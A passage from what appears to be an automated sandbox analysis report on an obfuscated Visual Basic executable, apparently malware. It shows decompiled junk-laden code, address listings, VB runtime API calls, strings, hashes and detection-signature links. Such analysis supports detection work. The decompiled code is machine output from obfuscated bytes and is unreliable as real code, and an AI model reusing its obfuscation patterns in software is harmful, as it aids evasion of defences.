																L49:
																_t216 = _t216 - 1;
																_t166 = _t166 + 1;
																_t301 = _t301 + 1;
																_t166 = _t166 + 1;
																_push(_t301);
																_t260 = _t260;
																_push(_t254);
																L51:
																_t216 = _t216 - 1;
																 *0x363084f =  *0x363084f + _t149;
																asm("wait");
																_t150 = _t149 + 0xef;
																 *_t254 =  *_t254 + _t254;
																 *_t150 =  *_t150 | _t150;
																 *_t166 =  *_t166 + 1;
																 *_t150 =  *_t150 ^ _t150;
																 *_t150 =  *_t150 + _t150;
																_t217 = _t216 |  *_t216;
																_t60 = _t271 + 0x69;
																 *_t60 =  *((intOrPtr*)(_t271 + 0x69)) + _t150;
																_t346 =  *_t60;
																asm("bound esp, [ebp+0x72]");
																if(_t346 >= 0 || _t346 < 0) {
																	L66:
																	 *_t150 =  *_t150 + _t150;
																	 *_t150 =  *_t150 + _t150;
																	 *_t150 =  *_t150 + _t150;
																	L67:
																	_pop(_t272);
																	_t150 = _t150 & 0x8db7005e;
																	asm("pushfd");
																	 *_t166 =  *_t166 + _t217;
																} else {
																	 *_t217 =  *_t217 + _t150;
																	 *_t271 =  *_t271 + _t217;
																	_t62 = _t271 + 0x6f;
																	 *_t62 =  *((intOrPtr*)(_t271 + 0x6f)) + _t217;
																	_t347 =  *_t62;
																	goto L55;
																}
															}
														}
													}
												}
											}
										} else {
											_t149 = _t159 ^ 0x06dc0500;
											goto L30;
										}
									}
								}
							}
						}
					}
				}
				 *_t166 =  *_t166 | _t150;
				 *_t166 =  *_t166 | _t150;
				 *_t166 =  *_t166 | _t150;
				 *_t166 =  *_t166 | _t150;
				 *_t166 =  *_t166 | _t150;
				 *_t166 =  *_t166 | _t150;
				 *_t166 =  *_t166 | _t150;
				 *_t166 =  *_t166 | _t150;
				 *_t166 =  *_t166 | _t150;
				 *_t166 =  *_t166 | _t150;
				 *_t166 =  *_t166 | _t150;
				 *_t166 =  *_t166 | _t150;
				 *_t166 =  *_t166 | _t150;
				_pop(_t151);
				asm("adc [esi+0x1], bl");
				_t197 = 0x000000d3 | _t272[0] | _t272[0] | _t272[0] | _t272[0] | _t272[0] | _t272[0] | _t272[0] | _t272[0] | _t272[0] | _t272[0] | _t272[0] | _t272[0] | _t272[0] | _t272[0] | _t272[0] | _t272[0] | _t272[0] | _t272[0] | _t272[0] | _t272[0] | _t272[0] | _t272[0] | _t272[0] | _t272[0] | _t272[0] | _t272[0] | _t272[0] | _t272[0] | _t272[0xf];
				gs = _t151;
				_t153 =  *((intOrPtr*)(_t151 - 1 + 0x3abbd72));
				_t246 = (((((((((((((_t217 |  *_t150) +  *_t166 |  *_t150) +  *_t166 |  *_t150) +  *_t166 |  *_t150) +  *_t166 |  *_t150) +  *_t166 |  *_t150) +  *_t166 |  *_t150) +  *_t166 |  *_t150) +  *_t166 |  *_t150) +  *_t166 |  *_t150) +  *_t166 |  *_t150) +  *_t166 |  *_t150) +  *_t166 |  *_t150) +  *_t166 |  *_t150;
				_t262 = 0xc6d1143d;
				while(1) {
					L69:
					asm("adc al, 0xd1");
					asm("invalid");
					 *((intOrPtr*)(_t197 - 0xaa35f86)) =  *((intOrPtr*)(_t197 - 0xaa35f86)) - _t246;
					asm("outsd");
					asm("aas");
					asm("int3");
					_t155 = _t153 + 0x00000001 & 0x8888c0d2;
					_push(_t246);
					asm("les eax, [edx-0x20]");
					 *_t155 =  *_t155 | 0xeaa2d568;
					while(1) {
						_t113 = _t155 - 0x2b;
						 *_t113 =  *(_t155 - 0x2b) | _t246;
						 *0x33d783ea = _t155;
						_t155 = 0xc;
						if( *_t113 <= 0) {
							goto L80;
						}
						L71:
						asm("lock lds edx, [ebx-0x6714db5a]");
						_t262 = _t262 + 1;
						_t155 =  *_t262;
						 *_t262 = 0xc;
						_pop(_t272);
						L72:
						_pop(_t295);
						_t246 =  *(_t262 - 0x4753b7df) * 0x45;
						if(_t246 != 0) {
							_t113 = _t155 - 0x2b;
							 *_t113 =  *(_t155 - 0x2b) | _t246;
							 *0x33d783ea = _t155;
							_t155 = 0xc;
							if( *_t113 <= 0) {
								goto L80;
							}
						} else {
							 *0xfab21c4a = _t155;
							_t255 = _t254 + _t246;
							do {
								_pop(es);
								_t254 = _t255 +  *((intOrPtr*)(_t262 - 0x34c3a793));
								do {
									_pop(_t295);
									_t303 =  *_t272;
									 *_t246 =  *_t246 ^ _t254;
									asm("outsb");
								} while ( *_t246 >= 0);
								asm("iretd");
								_t153 = _t155 ^  *(_t295 - 0x408cfda7);
								asm("std");
								if(_t153 < 0) {
									goto L69;
								} else {
									asm("cdq");
									asm("loop 0x5a");
									asm("das");
									_t246 = _t246 +  *((intOrPtr*)(_t295 - 0x50c673bc));
									asm("rcr byte [ebx-0x59ac295f], cl");
									asm("sti");
									_push(0x4f);
									asm("rol dword [ebp-0x434f5081], cl");
									_t155 = _t153 ^ 0x98f84f3d;
									_t369 = _t155;
									_t272 = 0x6ef0324b;
									_t120 = _t197;
									_t197 =  *_t155;
									 *_t155 = _t120;
									asm("lds ecx, [ebp+0x65]");
									asm("repe invalid");
									asm("aas");
									if(_t369 >= 0) {
										goto L78;
									}
								}
								goto L83;
								L78:
								asm("cdq");
							} while (_t369 > 0);
							 *(_t246 - 0x55) =  *(_t246 - 0x55) | 0xffffff9b;
							 *(_t155 + 0x264e7709) = _t246;
							asm("in al, 0xff");
							 *(_t262 - 0x6baa37dd) =  *(_t262 - 0x6baa37dd) ^ _t303;
							goto L80;
						}
						L83:
						asm("cdq");
						return _t155;
						L80:
						asm("enter 0x9455, 0x50");
						asm("rcr dword [edx-0xd], cl");
						if(_t155 < 0x8801108a) {
							goto L72;
						} else {
							asm("adc bh, 0x4c");
							asm("invalid");
							_t156 = _t155 + 0x56;
							asm("loope 0xf");
							_t155 = _t156 | 0xf5bc20e6;
							asm("in eax, dx");
							asm("cld");
							asm("iretd");
							asm("in eax, dx");
							asm("popfd");
							_t248 = _t246 - 1 - _t246 - 1;
							asm("repne pop esp");
							 *[fs:ebx] =  *[fs:ebx] + _t248;
							 *_t197 =  *_t197 + _t248;
							 *_t197 =  *_t197 + _t248;
							 *_t197 =  *_t197 + _t248;
							 *_t197 =  *_t197 + _t248;
							 *_t197 =  *_t197 + _t248;
							 *_t197 =  *_t197 + _t248;
							 *_t197 =  *_t197 + _t248;
							 *_t197 =  *_t197 + _t248;
							 *_t197 =  *_t197 + _t248;
							 *_t197 =  *_t197 + _t248;
							 *_t197 =  *_t197 + _t248;
							 *_t197 =  *_t197 + _t248;
							 *_t197 =  *_t197 + _t248;
							 *_t197 =  *_t197 + _t248;
							 *_t197 =  *_t197 + _t248;
							 *_t197 =  *_t197 + _t248;
							_pop(_t272);
							 *_t197 =  *_t197 + _t248;
						}
						goto L83;
					}
				}
			}

0x004017ac
0x004017ac
0x004017ac
0x004017ac
0x004017ac
0x004017b1
0x004017b6
0x004017b8
0x004017ba
0x004017bc
0x004017be
0x004017c0
0x004017c1
0x004017c3
0x004017c5
0x004017c7
0x004017c9
0x004017ca
0x004017cb
0x004017cc
0x004017d0
0x004017d1
0x004017d3
0x00401853
0x00401853
0x00401857
0x00401859
0x0040185a
0x0040185c
0x0040185e
0x004017d5
0x004017d5
0x004017d7
0x004017d9
0x004017db
0x004017dd
0x004017df
0x004017e1
0x004017e3
0x004017e5
0x004017e7
0x004017e7
0x004017ea
0x004017ed
0x004017f5
0x004017f7
0x004017f9
0x004017fb
0x004017fe
0x00401802
0x00401804
0x0040180d
0x00401815
0x0040181c
0x0040181d
0x00401823
0x0040182a
0x0040182c
0x0040182d
0x00401830
0x00401830
0x00401831
0x00401833
0x00401835
0x00401837
0x00401839
0x0040183b
0x0040183d
0x0040183f
0x00401841
0x00401843
0x00401845
0x00401847
0x00401849
0x0040184b
0x0040184d
0x0040184f
0x00401851
0x00000000
0x00401851
0x004017ea
0x0040185f
0x00401863
0x00401864
0x00401866
0x00401867
0x00401868
0x00401869
0x0040186a
0x0040186a
0x00401870
0x00401871
0x00401872
0x00401873
0x00401874
0x004018d7
0x004018d7
0x004018da
0x00000000
0x004018dc
0x004018dc
0x004018dd
0x004018e3
0x004018e5
0x004018e6
0x004018e8
0x004018ea
0x00000000
0x004018ec
0x00401876
0x00401876
0x00401877
0x00401878
0x004018b0
0x004018b0
0x004018b7
0x004018ba
0x004018bf
0x004018c1
0x004018c3
0x004018c5
0x00000000
0x0040187a
0x0040187a
0x0040187c
0x0040187e
0x0040187f
0x00401881
0x00401884
0x00401884
0x00401884
0x00401887
0x00401888
0x00401889
0x0040188a
0x004018ed
0x004018ed
0x004018ef
0x004018f1
0x004018f5
0x004018f8
0x004018f9
0x004018fd
0x004018ff
0x00401904
0x00401906
0x00401909
0x0040190d
0x00401911
0x00401912
0x00401913
0x00401914
0x00401915
0x00401916
0x0040191c
0x0040191e
0x0040191f
0x00401921
0x00401923
0x00401925
0x00401927
0x00401929
0x0040192b
0x0040192e
0x00401936
0x00401938
0x0040193b
0x00000000
0x0040193b
0x0040188c
0x0040188c
0x0040188d
0x0040188e
0x00401890
0x00401896
0x00401899
0x0040189b
0x004018a0
0x004018a3
0x004018a6
0x004018a8
0x004018aa
0x004018ac
0x004018af
0x00000000
0x004018af
0x004018c6
0x004018c6
0x004018c8
0x004018c9
0x004018cd
0x004018cf
0x004018d1
0x004018d3
0x004018d3
0x004018d5
0x0040193c
0x0040193c
0x00401944
0x00401945
0x00401945
0x0040194f
0x00401950
0x00401954
0x00401956
0x00401958
0x0040195a
0x0040195f
0x00000000
0x00000000
0x00000000
0x004018d5
0x0040188a
0x00401878
0x00401962
0x00401963
0x00401965
0x00401967
0x00401968
0x00401969
0x0040196a
0x0040196c
0x0040196c
0x00401972
0x00401974
0x004019dc
0x004019dc
0x004019e2
0x004019e4
0x004019e5
0x004019e7
0x004019e8
0x00000000
0x00401977
0x00401977
0x004019e9
0x004019e9
0x00000000
0x00401979
0x00401979
0x004019ea
0x004019ea
0x004019ec
0x004019ee
0x004019f0
0x004019f1
0x004019f1
0x004019f5
0x004019f6
0x004019f7
0x004019f8
0x004019fa
0x00000000
0x004019fc
0x004019fc
0x004019fd
0x004019fe
0x00000000
0x004019fe
0x0040197b
0x0040197b
0x0040197d
0x00401982
0x00401984
0x00401985
0x00401987
0x00401989
0x00401989
0x0040198a
0x0040198d
0x0040198f
0x00401990
0x00401990
0x00401992
0x00401993
0x00401994
0x00401996
0x00401a0b
0x00401a0b
0x00401998
0x00401998
0x00401a03
0x00401a03
0x00401a04
0x00401a04
0x00401a04
0x00401a07
0x00000000
0x00401a0a
0x00401a0a
0x00000000
0x00401a0a
0x0040199a
0x0040199a
0x0040199d
0x0040199f
0x004019af
0x004019b0
0x004019b5
0x004019b7
0x004019b9
0x004019bb
0x004019bd
0x004019c3
0x004019c5
0x004019c6
0x004019c8
0x004019c9
0x004019ca
0x004019cb
0x004019cc
0x004019ce
0x004019d0
0x004019d0
0x004019d3
0x00401a48
0x00401a49
0x00401a4a
0x00401a4b
0x00401a4d
0x00401a4f
0x00000000
0x004019d5
0x004019d5
0x004019d9
0x00401a50
0x00401a50
0x00401a52
0x00401a54
0x00401a54
0x00401a56
0x00401a5a
0x00401ac1
0x00401ac4
0x00401ac5
0x00401ac9
0x00000000
0x00401a5c
0x00401a5c
0x00401a5d
0x00401ad4
0x00401ad6
0x00000000
0x00401a5f
0x00401a5f
0x00401aca
0x00401aca
0x00401ad0
0x00401ad2
0x00000000
0x00401a61
0x00401a61
0x00401ad7
0x00401ad7
0x00401ad8
0x00401ad9
0x00401adc
0x00401ade
0x00401ae0
0x00401ae2
0x00401ae4
0x00401ae6
0x00401ae8
0x00401aee
0x00401af0
0x00401af2
0x00401af4
0x00401af6
0x00401af8
0x00401afb
0x00401afd
0x00401aff
0x00401b01
0x00401b03
0x00401b05
0x00000000
0x00401a63
0x00401a63
0x00401a64
0x00401a65
0x00401a9e
0x00401a9e
0x00401a9f
0x00401aa0
0x00401aa1
0x00401aa4
0x00401aa6
0x00000000
0x00401aa8
0x00401aa8
0x00401aa9
0x00401aa9
0x00401a67
0x00401a67
0x00401a69
0x00401a6b
0x00401a6e
0x00401a6f
0x00401a70
0x00401a71
0x00401a71
0x00401a72
0x00401a73
0x00401a75
0x00401a76
0x00401a77
0x00401a78
0x00401a79
0x00401a79
0x00401a7a
0x00401a80
0x00401a81
0x00401a83
0x00401a85
0x00401a87
0x00401a89
0x00401a8b
0x00401a8d
0x00401a8f
0x00401a8f
0x00401a8f
0x00401a92
0x00401a95
0x00401b07
0x00401b07
0x00401b09
0x00401b0b
0x00401b0d
0x00401b0d
0x00401b0e
0x00401b13
0x00401b14
0x00401a99
0x00401a99
0x00401a9b
0x00401a9d
0x00401a9d
0x00401a9d
0x00000000
0x00401a9d
0x00401a95
0x00401a65
0x00401a61
0x00401a5f
0x00401a5d
0x004019db
0x004019db
0x00000000
0x004019db
0x004019d9
0x004019d3
0x00401998
0x00401996
0x00401979
0x00401977
0x00401b19
0x00401b1f
0x00401b25
0x00401b2b
0x00401b31
0x00401b37
0x00401b3d
0x00401b43
0x00401b49
0x00401b4f
0x00401b55
0x00401b5b
0x00401b61
0x00401b69
0x00401b6c
0x00401bc3
0x00401bc6
0x00401bc9
0x00401bcf
0x00401bd0
0x00401bd2
0x00401bd2
0x00401bd2
0x00401bd4
0x00401bd6
0x00401bdc
0x00401bde
0x00401bdf
0x00401be0
0x00401be5
0x00401be6
0x00401be9
0x00401bea
0x00401bea
0x00401bea
0x00401bed
0x00401bf2
0x00401bf4
0x00000000
0x00000000
0x00401bf6
0x00401bf6
0x00401bfd
0x00401bfe
0x00401bfe
0x00401c00
0x00401c01
0x00401c01
0x00401c02
0x00401c09
0x00401bea
0x00401bea
0x00401bed
0x00401bf2
0x00401bf4
0x00000000
0x00000000
0x00401c0b
0x00401c0b
0x00401c10
0x00401c12
0x00401c12
0x00401c13
0x00401c17
0x00401c19
0x00401c1a
0x00401c1c
0x00401c1e
0x00401c1e
0x00401c21
0x00401c22
0x00401c28
0x00401c29
0x00000000
0x00401c2b
0x00401c2b
0x00401c2c
0x00401c2e
0x00401c30
0x00401c36
0x00401c3c
0x00401c3d
0x00401c3f
0x00401c45
0x00401c45
0x00401c4a
0x00401c4f
0x00401c4f
0x00401c4f
0x00401c51
0x00401c54
0x00401c57
0x00401c58
0x00000000
0x00000000
0x00401c58
0x00000000
0x00401c5a
0x00401c5a
0x00401c5a
0x00401c5d
0x00401c61
0x00401c67
0x00401c69
0x00000000
0x00401c69
0x00401cc8
0x00401cf1
0x00401cf2
0x00401c6c
0x00401c6c
0x00401c70
0x00401c78
0x00000000
0x00401c7a
0x00401c7a
0x00401c7d
0x00401c7f
0x00401c83
0x00401c84
0x00401c8a
0x00401c8b
0x00401c8c
0x00401c8d
0x00401c8e
0x00401c8f
0x00401c91
0x00401c93
0x00401c97
0x00401c9a
0x00401c9d
0x00401ca0
0x00401ca3
0x00401ca6
0x00401ca9
0x00401cac
0x00401caf
0x00401cb2
0x00401cb5
0x00401cb8
0x00401cbb
0x00401cbe
0x00401cc1
0x00401cc4
0x00401cc6
0x00401cc7
0x00401cc7
0x00000000
0x00401c78
0x00401bea

APIs

#100.MSVBVM60(VB5!6&*), ref: 004017B1

Strings

VB5!6&*, xrefs: 004017AC, 0040190B, 00401915

Memory Dump Source

Source File: 00000000.00000002.591272798.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.591259855.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.591326633.000000000041B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.591343142.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: #100
String ID: VB5!6&*
API String ID: 1341478452-3593831657
Opcode ID: 58e9e3611f0641e3cb26b2b37caeb82ad5709eb3abb01cf2e33f3eaf2da68c3c
Instruction ID: 7cabbda699271f582ac02b3444e3d492df4f0d61ace822d2d73aa6ea3a2c206c
Opcode Fuzzy Hash: 58e9e3611f0641e3cb26b2b37caeb82ad5709eb3abb01cf2e33f3eaf2da68c3c
Instruction Fuzzy Hash: EA126D7244E3D08FD71BDB74C9A56A1BFB0EE1332431901DBC4C29F5A7D628285ACB66

Uniqueness

Uniqueness Score: -1.00%

Function 00411BC0, Relevance: 42.2, APIs: 19, Strings: 5, Instructions: 150COMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60 ref: 00411C00
#689.MSVBVM60(Afkappendes,bena,INEQUIVALENT), ref: 00411C35
__vbaStrMove.MSVBVM60 ref: 00411C40
__vbaStrCmp.MSVBVM60(00000000,00000000), ref: 00411C48
__vbaFreeStr.MSVBVM60 ref: 00411C5B
__vbaNew2.MSVBVM60(0040D4A4,0041B360), ref: 00411C7C
__vbaHresultCheckObj.MSVBVM60(00000000,02CAE994,0040D494,00000014), ref: 00411CA7
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040D4B4,000000D8), ref: 00411CD5
__vbaStrMove.MSVBVM60 ref: 00411CE0
__vbaFreeObj.MSVBVM60 ref: 00411CE9
__vbaNew2.MSVBVM60(0040D4A4,0041B360), ref: 00411D01
__vbaHresultCheckObj.MSVBVM60(00000000,02CAE994,0040D494,00000014), ref: 00411D26
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040D4B4,000000D0), ref: 00411D4C
__vbaStrMove.MSVBVM60 ref: 00411D57
__vbaFreeObj.MSVBVM60 ref: 00411D60
__vbaInStr.MSVBVM60(00000000,remises,Acromimia,FFDB7B0B), ref: 00411D76
__vbaFreeStr.MSVBVM60(00411DB3), ref: 00411DA6
__vbaFreeStr.MSVBVM60 ref: 00411DAB
__vbaFreeStr.MSVBVM60 ref: 00411DB0

Strings

Afkappendes, xrefs: 00411C2D
Acromimia, xrefs: 00411D6B
INEQUIVALENT, xrefs: 00411C18
remises, xrefs: 00411D70
bena, xrefs: 00411C28

Memory Dump Source

Source File: 00000000.00000002.591272798.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.591259855.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.591326633.000000000041B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.591343142.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$Move$New2$#689Copy
String ID: Acromimia$Afkappendes$INEQUIVALENT$bena$remises
API String ID: 3839436293-732248126
Opcode ID: f3c37e00f3e306cd35ff91caaa69af1e4225ccf7cbdff25733bb4cadba47d713
Instruction ID: 5603953f3659c2ea5684951d87b1877daed0438d1a2907edc010f749c56121df
Opcode Fuzzy Hash: f3c37e00f3e306cd35ff91caaa69af1e4225ccf7cbdff25733bb4cadba47d713
Instruction Fuzzy Hash: FF518371D002099FCB04DFA4DD89EDDBBB4FF18704F14852AE505B72A0D7786945CBA8

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 02240ED2, Relevance: .2, Instructions: 207COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.591786294.0000000002240000.00000040.00000001.sdmp, Offset: 02240000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f429094aa3bc507834a48b5875d2760bf58f38916a8190746bb397b12393f037
Instruction ID: 022b1e55da3cff9f9fd9001f9f734231a69046ee8ae87ff2d5fecd81cba67f3c
Opcode Fuzzy Hash: f429094aa3bc507834a48b5875d2760bf58f38916a8190746bb397b12393f037
Instruction Fuzzy Hash: 315104F3C2D55497C32A8E3CC8C39DB7BA4EA1567031909A6D8A19F643F6684C46DBD0

Uniqueness

Uniqueness Score: -1.00%

Function 02240F34, Relevance: .2, Instructions: 164COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.591786294.0000000002240000.00000040.00000001.sdmp, Offset: 02240000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5cde8cc94d66ec4929e00ac57a34f7a41a6707369ea0a20a1636b9b0539b599
Instruction ID: 8473640a0ec219354881083d1c1e2773992d608522ee5e719a608f4f4f03aa57
Opcode Fuzzy Hash: a5cde8cc94d66ec4929e00ac57a34f7a41a6707369ea0a20a1636b9b0539b599
Instruction Fuzzy Hash: A441D3F3D2C55447C3268E3CC8835EB7BE5EA0567031949A2D8A19FA43F1648D4396D0

Uniqueness

Uniqueness Score: -1.00%

Function 022428A3, Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.591786294.0000000002240000.00000040.00000001.sdmp, Offset: 02240000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08cbd85fa2e47aea3a6e865d3f0c843a9bf160855ef929a1e35707f70132e3a5
Instruction ID: 871f121ed8a0d49351fea9c221f987392c6d469ec556ca2e17f9cbc97de5d42f
Opcode Fuzzy Hash: 08cbd85fa2e47aea3a6e865d3f0c843a9bf160855ef929a1e35707f70132e3a5
Instruction Fuzzy Hash: BC41CE73A1A152CFC719CF28C4920DEBFA1AF1A66035C51EBC4658F59BEB204842DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0224282A, Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.591786294.0000000002240000.00000040.00000001.sdmp, Offset: 02240000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4f6ea81806d42e3173f5b4ef64bc787df8c7d012890cd45772beeaff6d46ca6
Instruction ID: f3d6253f8135efc6155e8e990b65a9393935d053e2059246a9002c86f1fbf45d
Opcode Fuzzy Hash: e4f6ea81806d42e3173f5b4ef64bc787df8c7d012890cd45772beeaff6d46ca6
Instruction Fuzzy Hash: 4831AA73A2A652CBC31A8F34C4961CEFBA1EF1666436C45EBC4919F54BE7244482C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 022406C3, Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.591786294.0000000002240000.00000040.00000001.sdmp, Offset: 02240000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 436c4b9361ca8209c4a2ff79b522491dbd749d690b118e643939d643c662a08e
Instruction ID: cd1a6f10080b21a6482bc907f668a8429259921dc94c41a6016da3521c5fb006
Opcode Fuzzy Hash: 436c4b9361ca8209c4a2ff79b522491dbd749d690b118e643939d643c662a08e
Instruction Fuzzy Hash: D3316AB382D9948BC71A8F7480D30DB7FE0EF2575875885EAC4919F113EAA48A43CB80

Uniqueness

Uniqueness Score: -1.00%

Function 0224651E, Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.591786294.0000000002240000.00000040.00000001.sdmp, Offset: 02240000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ddfc0d3e4b65f55dedd931724192b2d0f68d258dc8e906379828a885dc0851c
Instruction ID: 76dedc3e5475511e29509d9164a6baf246eff5e6a6e4181cd47bb464d503efff
Opcode Fuzzy Hash: 6ddfc0d3e4b65f55dedd931724192b2d0f68d258dc8e906379828a885dc0851c
Instruction Fuzzy Hash: 6031AAB29085018BC32A8F24C4C35DBBBF5EF196203594DDAC8D14F647FA648D83CB50

Uniqueness

Uniqueness Score: -1.00%

Function 02240702, Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.591786294.0000000002240000.00000040.00000001.sdmp, Offset: 02240000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4a9f7cd06a8522ede59b952d0fccdca631bd20765e03f8830a7a0733b8c48fb
Instruction ID: f67233d8daea4375093bbd1edaee989250eacd35af33890214b773e64c98bb1e
Opcode Fuzzy Hash: a4a9f7cd06a8522ede59b952d0fccdca631bd20765e03f8830a7a0733b8c48fb
Instruction Fuzzy Hash: CF2107B391D9A08BC3268A34C0D30DB7BE0DF1566875D88EAC4919F517F6A88E43DA90

Uniqueness

Uniqueness Score: -1.00%

Function 02245CAF, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.591786294.0000000002240000.00000040.00000001.sdmp, Offset: 02240000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d42e2f5ecb159710419c1255503f4b22a12d338324073de6179e1ccefee6fd47
Instruction ID: a4d18179f4c259b5adefa87353f51a855e222326304474ea8382d25b769345e6
Opcode Fuzzy Hash: d42e2f5ecb159710419c1255503f4b22a12d338324073de6179e1ccefee6fd47
Instruction Fuzzy Hash: D4213A72D1D5948BC70B8B34C4824DA7BF1DE0A66479848E6C4A19F707F6648D52CB94

Uniqueness

Uniqueness Score: -1.00%

Function 004191E0, Relevance: 47.5, APIs: 25, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60 ref: 00419250
__vbaRedim.MSVBVM60(00000880,00000010,?,00000000,00000001,00000003,00000000), ref: 00419267
__vbaVarMove.MSVBVM60 ref: 00419294
__vbaVarMove.MSVBVM60 ref: 004192C0
__vbaVarMove.MSVBVM60 ref: 004192DD
__vbaVarMove.MSVBVM60 ref: 00419306
#665.MSVBVM60(?,3F800000,?), ref: 00419315
__vbaErase.MSVBVM60(00000000,?), ref: 00419320
__vbaVarTstNe.MSVBVM60(?,?), ref: 00419341
__vbaFreeVar.MSVBVM60 ref: 0041934D
#594.MSVBVM60(?), ref: 0041936E
__vbaFreeVar.MSVBVM60 ref: 00419377
__vbaNew2.MSVBVM60(0040D4A4,0041B360), ref: 0041938F
__vbaHresultCheckObj.MSVBVM60(00000000,02CAE994,0040D494,00000014), ref: 004193B4
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040D4B4,00000130), ref: 004193DE
__vbaStrMove.MSVBVM60 ref: 004193ED
__vbaFreeObj.MSVBVM60 ref: 004193F6
__vbaNew2.MSVBVM60(0040D4A4,0041B360), ref: 0041940E
__vbaHresultCheckObj.MSVBVM60(00000000,02CAE994,0040D494,00000038,?,?,?,?,?,?,?,0000000A), ref: 0041947F
__vbaVar2Vec.MSVBVM60(?,0000000A,?,?,?,?,?,?,?,0000000A), ref: 0041948D
__vbaAryMove.MSVBVM60(?,?,?,?,?,?,?,?,?,0000000A), ref: 0041949B
__vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,0000000A), ref: 004194A4
__vbaAryDestruct.MSVBVM60(00000000,?,0041950B), ref: 004194F4
__vbaFreeStr.MSVBVM60 ref: 00419503
__vbaFreeStr.MSVBVM60 ref: 00419508

Strings

{, xrefs: 00419457
AFSNRINGEN, xrefs: 00419436

Memory Dump Source

Source File: 00000000.00000002.591272798.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.591259855.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.591326633.000000000041B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.591343142.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$FreeMove$CheckHresult$New2$#594#665CopyDestructEraseRedimVar2
String ID: AFSNRINGEN${
API String ID: 3074978736-1400725761
Opcode ID: 01c7fd2d8f9508aef1e4768e1a95c660f7fc7de075586256bcbb029a7d8cf52d
Instruction ID: 65680267fe084f5e12ae99c6a68d06d607c3314ff4c7c70a0b4cc4accb51b11c
Opcode Fuzzy Hash: 01c7fd2d8f9508aef1e4768e1a95c660f7fc7de075586256bcbb029a7d8cf52d
Instruction Fuzzy Hash: 43A129B1D002189FDB04DF98D988ADDBBB8FF48704F10816AF50ABB265D774A985CF94

Uniqueness

Uniqueness Score: -1.00%

Function 004186E0, Relevance: 27.5, APIs: 18, Instructions: 478COMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60 ref: 00418753
__vbaAryConstruct2.MSVBVM60(?,0040D6D4,00000002), ref: 00418764
#610.MSVBVM60(?), ref: 00418774
#661.MSVBVM60(?,0040D6CC,00000000,3FF00000,?), ref: 00418789
#610.MSVBVM60(?), ref: 00418793
__vbaVarAdd.MSVBVM60(?,?,?,?), ref: 004187BF
__vbaVarTstNe.MSVBVM60(00000000), ref: 004187C6
__vbaFreeVarList.MSVBVM60(00000004,?,?,?,?), ref: 004187E4
__vbaNew2.MSVBVM60(0040D4A4,0041B360), ref: 00418EBC
__vbaHresultCheckObj.MSVBVM60(00000000,02CAE994,0040D494,00000014), ref: 00418EE7
__vbaHresultCheckObj.MSVBVM60(00000000,00006B16,0040D4B4,00000108), ref: 00418F18
__vbaFreeObj.MSVBVM60 ref: 00418F1D
__vbaNew2.MSVBVM60(0040D4A4,0041B360), ref: 00418F35
__vbaHresultCheckObj.MSVBVM60(00000000,02CAE994,0040D494,00000048), ref: 00418F5F
__vbaStrMove.MSVBVM60 ref: 00418F6A
__vbaFreeStr.MSVBVM60(00418FD9), ref: 00418FB9
__vbaFreeStr.MSVBVM60 ref: 00418FBE
__vbaAryDestruct.MSVBVM60(00000000,?), ref: 00418FD2

Memory Dump Source

Source File: 00000000.00000002.591272798.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.591259855.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.591326633.000000000041B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.591343142.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$#610New2$#661Construct2CopyDestructListMove
String ID:
API String ID: 3190467145-0
Opcode ID: 22fbc4f28f525929b5c12ac0747ba9008e44ff7478529d79729aa2372ccc0f16
Instruction ID: 6eff67b4cdf663362589ff34cec9a6e33dabb2609f029bf74f62678cc4d9a6cb
